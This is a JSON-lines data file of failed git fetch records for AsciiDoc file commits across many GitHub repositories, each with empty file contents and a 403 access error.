{"commit":"f41e5a45cf30ec91873b55230e2ac361caa56640","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"467b759040d3750ff68907431938043678bbcd61","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_man_from_the_eastern_europe.adoc","new_file":"content\/writings\/the_man_from_the_eastern_europe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3a31454205f0f26eb5204e180bfbe6d964f9b9f2","subject":"Update 2015-09-21-Introduction-to-Object.adoc","message":"Update 2015-09-21-Introduction-to-Object.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Introduction-to-Object.adoc","new_file":"_posts\/2015-09-21-Introduction-to-Object.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ce302e14ab375a166064d9bef0ca30506cbd00a","subject":"add articles","message":"add articles\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"articles.adoc","new_file":"articles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"a94de8587915ca79205b77fe0757c0163b4e7898","subject":"Update 2016-01-01-2016-The-goldern-year.adoc","message":"Update 2016-01-01-2016-The-goldern-year.adoc","repos":"JacobSamro\/blog,JacobSamro\/blog,JacobSamro\/blog","old_file":"_posts\/2016-01-01-2016-The-goldern-year.adoc","new_file":"_posts\/2016-01-01-2016-The-goldern-year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobSamro\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e3a22998f91f855eba4ce6f97da2da75e6efb11","subject":"Update 2017-05-06-Saturday-May-6th-2017.adoc","message":"Update 2017-05-06-Saturday-May-6th-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-05-06-Saturday-May-6th-2017.adoc","new_file":"_posts\/2017-05-06-Saturday-May-6th-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ada18ac99b7f340317de43ea5382d04dc4a999e6","subject":"[docs] - Update 1.1 release notes for Python.","message":"[docs] - Update 1.1 release notes for Python.\n\nIncludes various notes about changes to the Python client in the\n1.1 release.\n\nChange-Id: Icac07a016c3707ff5a4a027f8a07ea112318c790\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4998\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cef1ef3a9a1cf6e1f1a8dd62f1e57830d53905c","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6acba778803a2c47489ed3f8a328e3ee0eb2107d","subject":"Update 2017-10-08-Getting-started-with-AWS.adoc","message":"Update 2017-10-08-Getting-started-with-AWS.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-08-Getting-started-with-AWS.adoc","new_file":"_posts\/2017-10-08-Getting-started-with-AWS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d296bdf7d6d3f57bdce63ac3b2e896483fae0700","subject":"Update 2017-02-27-Episode-90-Test-Post.adoc","message":"Update 2017-02-27-Episode-90-Test-Post.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-27-Episode-90-Test-Post.adoc","new_file":"_posts\/2017-02-27-Episode-90-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe945631a2a18f54aa0710d04c116a7a4c8f653e","subject":"Update 2016-02-12-Why.adoc","message":"Update 2016-02-12-Why.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-Why.adoc","new_file":"_posts\/2016-02-12-Why.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ee954024ab32bab47bc65197094d11a66c0e0f4","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"792075ebcc37226210408aaf65ffce8adb6d6182","subject":"Update 2015-02-25-Por-que-amo-lo-que-hago.adoc","message":"Update 2015-02-25-Por-que-amo-lo-que-hago.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-25-Por-que-amo-lo-que-hago.adoc","new_file":"_posts\/2015-02-25-Por-que-amo-lo-que-hago.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b5e0cc94540bd1993a5fd82afba77d73cf86b90","subject":"Changing image name","message":"Changing image name\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"004440915ddbda8980923a9cd1fa7ce2edfe5d6e","subject":"y2b create post Headphones Made Of Wood!","message":"y2b create post Headphones Made Of Wood!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-14-Headphones-Made-Of-Wood.adoc","new_file":"_posts\/2016-05-14-Headphones-Made-Of-Wood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61b9e66fc60429990296b8ed98edd4596a51b07f","subject":"Update 2017-09-18-Functional-Rotterdam-15.adoc","message":"Update 2017-09-18-Functional-Rotterdam-15.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2017-09-18-Functional-Rotterdam-15.adoc","new_file":"_posts\/2017-09-18-Functional-Rotterdam-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f5cb768e3e12b7befbb10d9ce13ad1f922f7cc","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e707b0169c9952996dbb9816a360473a9d64aa65","subject":"Update readme file","message":"Update readme file\n","repos":"Adopt-a-JSR\/JCache-CDI","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Adopt-a-JSR\/JCache-CDI.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94292cbb82aeacfd5510b7dbddf542490fed1fe6","subject":"Adds README with ASCIIDoc format, will replace exisiting","message":"Adds README with ASCIIDoc format, will replace exisiting\n","repos":"HelioGuilherme66\/RIDE,robotframework\/RIDE,robotframework\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HelioGuilherme66\/RIDE.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d47e1b9be8bcaca1b59102debacf87787d94a0d4","subject":"added documentation","message":"added documentation\n","repos":"hivemq\/hivemq-hello-world-plugin,yongjhih\/rx-hivemq,yongjhih\/rx-hivemq,yongjhih\/rx-hivemq,hivemq\/hivemq-delete-retained-messages-recursively-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/hivemq-hello-world-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a4125711d0b1037639ddb0618149aa085e8bdc1","subject":"added README","message":"added README\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3e4b7f1a0931e8a4416238abf1b8d2798834e841","subject":"Update 2017-07-05-Test-on-Header-Image.adoc","message":"Update 2017-07-05-Test-on-Header-Image.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-05-Test-on-Header-Image.adoc","new_file":"_posts\/2017-07-05-Test-on-Header-Image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f2a32ed97cdfe6a389dda5f386cc501e0cf97a1","subject":"Fix README","message":"Fix README\n","repos":"pjanouch\/termo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/termo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1f1a3fdd00e16550863b664bf15cd9fecafc91c","subject":"Readme initial install was missing -P clone in Readme","message":"Readme initial install was missing -P clone in Readme\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a711910af74319c44afd4aae9d9847a711fefe0","subject":"Switch back to travis","message":"Switch back to travis\n","repos":"lburgazzoli\/hazelcast-discovery-dns","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/hazelcast-discovery-dns.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97b068150d467f14e82fd56a4ceb51d53ef53678","subject":"Added twitter batch","message":"Added twitter batch","repos":"johanhammar\/markup-document-builder,ronsmits\/markup-document-builder,Swagger2Markup\/markup-document-builder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronsmits\/markup-document-builder.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6518e4f825931af6f09d5454de989058c62a4fc","subject":"add clojurebridge seattle event","message":"add clojurebridge seattle event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_seattle.adoc","new_file":"content\/events\/2016\/clojurebridge_seattle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"758e261eb261a816231a1ccd093be354153b5567","subject":"y2b create post Sony DualShock 3 Charging Station Unboxing","message":"y2b create post Sony DualShock 3 Charging Station Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-23-Sony-DualShock-3-Charging-Station-Unboxing.adoc","new_file":"_posts\/2011-08-23-Sony-DualShock-3-Charging-Station-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b5e611077c2345952f524488d690318e5bb37d4","subject":"y2b create post I Bought The Cheapest Smartphone on Amazon...","message":"y2b create post I Bought The Cheapest Smartphone on Amazon...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-10-I-Bought-The-Cheapest-Smartphone-on-Amazon.adoc","new_file":"_posts\/2018-02-10-I-Bought-The-Cheapest-Smartphone-on-Amazon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d04988f3a07239194c11b99fa0e55cd8c4c8663a","subject":"notes","message":"notes\n","repos":"mannyfin\/IRAS,mannyfin\/IRAS","old_file":"GUA work\/GUA papers\/Quick Notes on papers\/Notes TPD HREELS of GUA on Zn Pt(111).adoc","new_file":"GUA work\/GUA papers\/Quick Notes on papers\/Notes TPD HREELS of GUA on Zn Pt(111).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mannyfin\/IRAS.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d778437ceab106ad8ec82ad0cde7f928334cbb87","subject":"- Added README.asciidoc","message":"- Added README.asciidoc\n","repos":"semkr\/workshops,semkr\/workshops,davidkirwan\/workshops,davidkirwan\/workshops","old_file":"IoT_WIT\/README.asciidoc","new_file":"IoT_WIT\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidkirwan\/workshops.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fe199f1b3fd8752960a2aded518fbdb0e7da237","subject":"Add documentation for the integration of ES pagination fixes Issue #179 (#351)","message":"Add documentation for the integration of ES pagination fixes Issue #179 (#351)\n\n* url-encoding only on query values #345\r\n* add documentation to use pagination with ES fixes #179\r\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"docs\/elasticsearch.adoc","new_file":"docs\/elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65dd61490753b9224718bb7997e5ead425bda1ec","subject":"Update 2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","message":"Update 2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","new_file":"_posts\/2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eafed97e0dc8bc6ce9c682c94f5010ec99dad6a6","subject":"Renamed '_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc' to '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc'","message":"Renamed '_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc' to '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42be388e9ae9e4b5d1a182d153036e501cbfe155","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbcae5b07035b1b4558320b0e1d17e91c1714013","subject":"Update dbm-clear-checksums.adoc","message":"Update dbm-clear-checksums.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-clear-checksums.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-clear-checksums.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"233826b626d90992d3dff09a0877d88c3d70e851","subject":"Update 2015-07-22-DDR-Dance-Dance-Robots.adoc","message":"Update 2015-07-22-DDR-Dance-Dance-Robots.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-22-DDR-Dance-Dance-Robots.adoc","new_file":"_posts\/2015-07-22-DDR-Dance-Dance-Robots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc13dd147f55fea8b3f7df24a1bb04a6b186cb11","subject":"Update 2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","message":"Update 2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","new_file":"_posts\/2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf616fcabfa5efab38056b7c02c38919775cd197","subject":"Update 2017-05-26-Learning-Deep-Learning.adoc","message":"Update 2017-05-26-Learning-Deep-Learning.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-26-Learning-Deep-Learning.adoc","new_file":"_posts\/2017-05-26-Learning-Deep-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66ef51d5b1f1b0a1e0c6a237b60e982b5bddd249","subject":"Added gitter badge","message":"Added gitter badge","repos":"GYMY-16\/gymybook,GYMY-16\/gymybook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/gymybook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5641f920b0eef39957a1f3fa3ddf8e293a844ad4","subject":"Readme: remove duplicated entry","message":"Readme: remove duplicated entry\n\n(hawkular-alerts-bus-api)","repos":"hawkular\/hawkular-alerts,jpkrohling\/hawkular-alerts,jsanda\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,jsanda\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec2a41547af8c4b9bea93ff98e962339fe245d36","subject":"Added readme","message":"Added readme\n","repos":"aroq\/drubone,aroq\/drubone","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aroq\/drubone.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae456962a780a87c6281f903f20323efb913aa00","subject":"replacing tabs and adding a README","message":"replacing tabs and adding a README\n","repos":"rmannibucau\/boon-jaxrs-provider","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmannibucau\/boon-jaxrs-provider.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b7c0063bf846e5b4f425c496701297b577e372b","subject":"docs: Fix perf links","message":"docs: Fix perf links\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e662be717569402e5509c3ad48bb5e17e9c392a6","subject":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","message":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3258dd17ae77f30ef373e303f9ba5148fcb70fc","subject":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 